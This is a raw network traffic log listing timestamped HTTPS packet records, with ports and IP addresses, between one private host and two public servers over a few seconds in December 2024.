Dec 30, 2024 11:25:31.787234068 CET	443	49856	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.787298918 CET	443	49856	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.787446976 CET	49856	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.787955046 CET	49856	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.787970066 CET	443	49856	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.788615942 CET	49866	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.788666010 CET	443	49866	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.788809061 CET	49866	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.789014101 CET	49866	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.789031029 CET	443	49866	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.099394083 CET	443	49863	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.099572897 CET	49863	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.100171089 CET	443	49863	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.100292921 CET	49863	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.135874033 CET	49863	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.135891914 CET	443	49863	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.136212111 CET	443	49863	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.136382103 CET	49863	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.136945009 CET	49863	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.179325104 CET	443	49863	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.259280920 CET	443	49864	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.259363890 CET	49864	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.259887934 CET	49864	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.259896040 CET	443	49864	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.262475014 CET	49864	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.262485981 CET	443	49864	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.304974079 CET	443	49865	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.305049896 CET	49865	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.305723906 CET	443	49865	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.305771112 CET	49865	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.308106899 CET	49865	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.308120966 CET	443	49865	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.308446884 CET	443	49865	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.308553934 CET	49865	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.309138060 CET	49865	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.351346016 CET	443	49865	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.389344931 CET	443	49866	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.389447927 CET	49866	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.390053988 CET	49866	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.390064001 CET	443	49866	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.390255928 CET	49866	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.390261889 CET	443	49866	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.621172905 CET	443	49863	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.621260881 CET	443	49863	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.621269941 CET	49863	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.621337891 CET	49863	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.621831894 CET	49863	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.621849060 CET	443	49863	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.622452974 CET	49874	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.622504950 CET	443	49874	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.622570038 CET	49874	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.623033047 CET	49874	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.623054028 CET	443	49874	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.676620960 CET	443	49865	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.676681995 CET	49865	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.676698923 CET	443	49865	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.676738024 CET	49865	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.677876949 CET	443	49865	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.677925110 CET	49865	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.677930117 CET	443	49865	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.677973032 CET	49865	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.684402943 CET	49865	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.684420109 CET	443	49865	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.685201883 CET	49875	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.685234070 CET	443	49875	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.685333967 CET	49875	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.685559988 CET	49875	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:32.685571909 CET	443	49875	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:32.796740055 CET	443	49864	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.796789885 CET	443	49864	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.796838999 CET	49864	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.796863079 CET	443	49864	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.796869993 CET	49864	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.796891928 CET	443	49864	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.796926975 CET	49864	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.796961069 CET	49864	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.798914909 CET	49864	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.798938036 CET	443	49864	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.799880028 CET	49876	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.799917936 CET	443	49876	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.800008059 CET	49876	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.800256014 CET	49876	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.800272942 CET	443	49876	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.803536892 CET	443	49866	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.803589106 CET	443	49866	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.803621054 CET	49866	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.803621054 CET	49866	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.803639889 CET	443	49866	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.803678036 CET	49866	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.803683996 CET	443	49866	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.803700924 CET	443	49866	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.803721905 CET	49866	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.803740025 CET	49866	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.814201117 CET	49866	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.814219952 CET	443	49866	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.814786911 CET	49877	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.814835072 CET	443	49877	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:32.814903975 CET	49877	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.815119982 CET	49877	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:32.815143108 CET	443	49877	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:33.241990089 CET	443	49874	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:33.242228031 CET	49874	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:33.242841005 CET	49874	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:33.242841005 CET	49874	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:33.242851019 CET	443	49874	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:33.242867947 CET	443	49874	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:33.286472082 CET	443	49875	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:33.287075996 CET	49875	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:33.287523031 CET	49875	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:33.287533998 CET	443	49875	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:33.287786961 CET	49875	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:33.287792921 CET	443	49875	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:33.417610884 CET	443	49877	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:33.417695045 CET	49877	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:33.418380022 CET	49877	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:33.418390989 CET	443	49877	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:33.418618917 CET	49877	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:33.418625116 CET	443	49877	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:33.427510023 CET	443	49876	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:33.427774906 CET	49876	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:33.428164005 CET	49876	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:33.428175926 CET	443	49876	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:33.428390980 CET	49876	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:33.428396940 CET	443	49876	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:33.553071976 CET	49875	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:33.553072929 CET	49874	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:33.553096056 CET	49876	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:33.553112030 CET	49877	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:33.556754112 CET	49886	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:33.556783915 CET	443	49886	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:33.557214975 CET	49886	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:33.558562994 CET	49886	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:33.558578014 CET	443	49886	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:33.561270952 CET	49887	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:33.561309099 CET	443	49887	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:33.561625957 CET	49887	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:33.561747074 CET	49887	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:33.561764002 CET	443	49887	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.160485983 CET	443	49887	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.161067009 CET	49887	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.176373005 CET	49887	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.176388979 CET	443	49887	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.177228928 CET	443	49886	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.177336931 CET	49886	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.179425955 CET	49887	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.179434061 CET	443	49887	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.179980040 CET	49886	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.179980993 CET	49886	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.179991007 CET	443	49886	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.180001974 CET	443	49886	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.532030106 CET	443	49887	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.532195091 CET	49887	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.532224894 CET	443	49887	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.532300949 CET	49887	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.533616066 CET	443	49887	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.533658028 CET	443	49887	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.533721924 CET	49887	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.533721924 CET	49887	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.553421021 CET	443	49886	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.553553104 CET	49886	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.553571939 CET	443	49886	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.553642035 CET	49886	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.554754972 CET	443	49886	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.554805040 CET	443	49886	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.554840088 CET	49886	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.554872990 CET	49886	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.779671907 CET	49887	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.779695988 CET	443	49887	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.780167103 CET	49893	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:34.780200005 CET	443	49893	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:34.780282974 CET	49893	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:34.780451059 CET	49894	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.780471087 CET	443	49894	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.780518055 CET	49894	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.780718088 CET	49894	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.780729055 CET	443	49894	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.834976912 CET	49886	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.834995985 CET	443	49886	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.844492912 CET	49895	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:34.844516039 CET	443	49895	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:34.844578028 CET	49895	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:34.845288992 CET	49896	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.845343113 CET	443	49896	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.845401049 CET	49896	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.848360062 CET	49896	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:34.848381996 CET	443	49896	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:34.904403925 CET	49893	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:34.904428959 CET	443	49893	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:34.908389091 CET	49895	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:34.908406973 CET	443	49895	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:35.378740072 CET	443	49894	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.379004955 CET	49894	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.379374027 CET	49894	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.379379034 CET	443	49894	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.379664898 CET	49894	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.379668951 CET	443	49894	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.466473103 CET	443	49896	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.466531038 CET	49896	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.467009068 CET	49896	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.467020035 CET	443	49896	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.467299938 CET	49896	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.467305899 CET	443	49896	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.504079103 CET	443	49893	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:35.504152060 CET	49893	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:35.507482052 CET	443	49895	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:35.507570982 CET	49895	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:35.507803917 CET	49893	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:35.507812977 CET	443	49893	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:35.509689093 CET	49893	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:35.509697914 CET	443	49893	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:35.514475107 CET	49895	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:35.514482975 CET	443	49895	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:35.514600992 CET	49895	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:35.514605045 CET	443	49895	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:35.757337093 CET	443	49894	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.757416964 CET	49894	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.757426023 CET	443	49894	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.757467985 CET	49894	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.758333921 CET	49894	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.758377075 CET	443	49894	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.758562088 CET	443	49894	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.758618116 CET	49894	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.758629084 CET	49894	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.759005070 CET	49910	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.759026051 CET	443	49910	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.759092093 CET	49910	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.759310007 CET	49910	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.759325981 CET	443	49910	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.846805096 CET	443	49896	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.847012997 CET	49896	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.847023964 CET	443	49896	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.847073078 CET	49896	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.847785950 CET	443	49896	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.847826004 CET	443	49896	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.847851038 CET	49896	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.847872972 CET	49896	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.848617077 CET	49896	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.848629951 CET	443	49896	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.849281073 CET	49911	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.849308014 CET	443	49911	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.849378109 CET	49911	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.851363897 CET	49911	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:35.851376057 CET	443	49911	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:35.968720913 CET	443	49893	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:35.968764067 CET	443	49893	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:35.968815088 CET	49893	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:35.968815088 CET	49893	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:35.968825102 CET	443	49893	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:35.968873024 CET	49893	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:35.968878984 CET	443	49893	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:35.968888998 CET	443	49893	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:35.968920946 CET	49893	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:35.968964100 CET	49893	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:35.970679045 CET	49893	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:35.970688105 CET	443	49893	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:35.971476078 CET	49912	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:35.971515894 CET	443	49912	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:35.971575975 CET	49912	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:35.971885920 CET	49912	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:35.971915007 CET	443	49912	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.113769054 CET	443	49895	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.113831043 CET	443	49895	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.113928080 CET	49895	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.113940954 CET	443	49895	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.113954067 CET	443	49895	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.113995075 CET	49895	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.114094973 CET	49895	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.115556955 CET	49895	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.115571976 CET	443	49895	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.116122007 CET	49913	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.116156101 CET	443	49913	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.116261005 CET	49913	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.116553068 CET	49913	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.116568089 CET	443	49913	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.366688013 CET	443	49910	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.366825104 CET	49910	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.367677927 CET	443	49910	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.367816925 CET	49910	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.389902115 CET	49910	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.389923096 CET	443	49910	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.390192986 CET	443	49910	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.390247107 CET	49910	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.390676975 CET	49910	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.435334921 CET	443	49910	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.477423906 CET	443	49911	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.477505922 CET	49911	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.478174925 CET	443	49911	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.478238106 CET	49911	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.513900995 CET	49911	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.513914108 CET	443	49911	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.514173031 CET	443	49911	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.514250994 CET	49911	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.514642954 CET	49911	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.555335999 CET	443	49911	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.572359085 CET	443	49912	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.572520018 CET	49912	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.573024035 CET	49912	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.573052883 CET	443	49912	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.573235989 CET	49912	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.573250055 CET	443	49912	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.717732906 CET	443	49913	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.717823029 CET	49913	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.735266924 CET	49913	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.735272884 CET	443	49913	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.735565901 CET	49913	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.735572100 CET	443	49913	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.742718935 CET	443	49910	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.742856979 CET	49910	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.742877960 CET	443	49910	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.743002892 CET	49910	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.743057013 CET	49910	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.743098021 CET	443	49910	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.743279934 CET	49910	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.743280888 CET	443	49910	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.743329048 CET	49910	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.743865013 CET	49921	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.743922949 CET	443	49921	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.743988037 CET	49921	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.745362043 CET	49921	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.745385885 CET	443	49921	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.855751991 CET	443	49911	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.855849981 CET	49911	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.855864048 CET	443	49911	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.855947971 CET	49911	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.856069088 CET	49911	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.856112003 CET	443	49911	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.856189013 CET	49911	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.856575012 CET	49923	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.856651068 CET	443	49923	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.856852055 CET	49923	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.857209921 CET	49923	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:36.857233047 CET	443	49923	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:36.984913111 CET	443	49912	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.984966993 CET	443	49912	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.984994888 CET	49912	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.985035896 CET	443	49912	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.985054016 CET	49912	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.985104084 CET	443	49912	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.985146046 CET	49912	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.986588955 CET	49912	443	192.168.2.10	142.250.184.225
